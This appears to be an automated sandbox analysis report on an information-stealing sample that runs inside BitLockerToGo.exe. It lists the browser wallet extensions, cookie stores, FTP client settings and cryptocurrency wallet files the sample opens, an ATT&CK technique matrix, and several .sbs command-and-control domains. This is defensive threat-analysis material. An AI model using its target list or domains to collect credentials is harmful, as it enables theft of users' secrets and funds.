                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.5Setup.exe.20ae000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2002000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2058000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.20ae000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2002000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2058000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1880927609.0000000002058000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1880927609.0000000002002000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      311
                      Process Injection
                      11
                      Virtualization/Sandbox Evasion
                      2
                      OS Credential Dumping
                      111
                      Security Software Discovery
                      Remote Services1
                      Archive Collected Data
                      21
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      311
                      Process Injection
                      LSASS Memory11
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol41
                      Data from Local System
                      2
                      Non-Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell
                      Logon Script (Windows)Logon Script (Windows)11
                      Deobfuscate/Decode Files or Information
                      Security Account Manager1
                      Process Discovery
                      SMB/Windows Admin Shares2
                      Clipboard Data
                      113
                      Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                      Obfuscated Files or Information
                      NTDS1
                      File and Directory Discovery
                      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets22
                      System Information Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                      http://x1.c.lencr.org/00%URL Reputationsafe
                      http://x1.i.lencr.org/00%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fashionablei.sbs
                      188.114.96.3
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        fashionablei.sbstrue
                          unknown
                          strikebripm.sbstrue
                            unknown
                            ostracizez.sbstrue
                              unknown
                              offybirhtdi.sbstrue
                                unknown
                                mediavelk.sbstrue
                                  unknown
                                  definitib.sbstrue
                                    unknown
                                    elaboretib.sbstrue
                                      unknown
                                      activedomest.sbstrue
                                        unknown
                                        https://fashionablei.sbs/apitrue
                                          unknown
                                          arenbootk.sbstrue
                                            unknown
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://html4/loose.dtd5Setup.exefalse
                                              unknown
                                              https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://fashionablei.sbs/api4BitLockerToGo.exe, 00000001.00000003.2023658335.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resourcesKind5Setup.exefalse
                                                  unknown
                                                  https://fashionablei.sbs:443/apiBitLockerToGo.exe, 00000001.00000003.1987980224.000000000320C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987567495.0000000003207000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987700095.000000000320A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000001.00000003.1919884934.00000000054CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://.css5Setup.exefalse
                                                      unknown
                                                      https://golang.org/pkg/unicode/#IsPrint.5Setup.exefalse
                                                        unknown
                                                        https://fashionablei.sbs/BitLockerToGo.exe, 00000001.00000003.1947187258.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1891228978.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1975164075.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://fashionablei.sbs/apiOBitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://x1.c.lencr.org/0BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://x1.i.lencr.org/0BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://fashionablei.sbs/apiHBitLockerToGo.exe, 00000001.00000003.2023658335.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://fashionablei.sbs/apibBitLockerToGo.exe, 00000001.00000003.1946815014.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1947187258.0000000003209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://fashionablei.sbs/api_BitLockerToGo.exe, 00000001.00000003.1934413689.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://fashionablei.sbs/apidBitLockerToGo.exe, 00000001.00000003.1975348693.0000000003209000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://.jpg5Setup.exefalse
                                                                      unknown
                                                                      https://fashionablei.sbs/apiqBitLockerToGo.exe, 00000001.00000003.1988260687.0000000003213000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024217475.000000000320F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987980224.000000000320C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987567495.0000000003207000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1988040262.000000000320D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987700095.000000000320A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2023599483.000000000320F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://fashionablei.sbs/..BitLockerToGo.exe, 00000001.00000003.1975316936.0000000005479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md#data-types5Setup.exefalse
                                                                              unknown
                                                                              https://fashionablei.sbs/apiobBitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://fashionablei.sbs/reBitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000001.00000003.1919884934.00000000054CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://fashionablei.sbs/apibuoBitLockerToGo.exe, 00000001.00000002.2024217475.000000000320F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2023599483.000000000320F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://fashionablei.sbs/ayBitLockerToGo.exe, 00000001.00000003.1961874563.000000000320B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000001.00000003.1947926828.0000000005598000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://fashionablei.sbs/nBitLockerToGo.exe, 00000001.00000002.2024024374.000000000316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://golang.org/pkg/unicode/#IsPrint.values5Setup.exefalse
                                                                                            unknown
                                                                                            https://fashionablei.sbs/apiopKBitLockerToGo.exe, 00000001.00000003.1988260687.0000000003213000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987980224.000000000320C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987567495.0000000003207000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1975348693.0000000003209000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1988040262.000000000320D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1987700095.000000000320A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kindsThe5Setup.exefalse
                                                                                                unknown
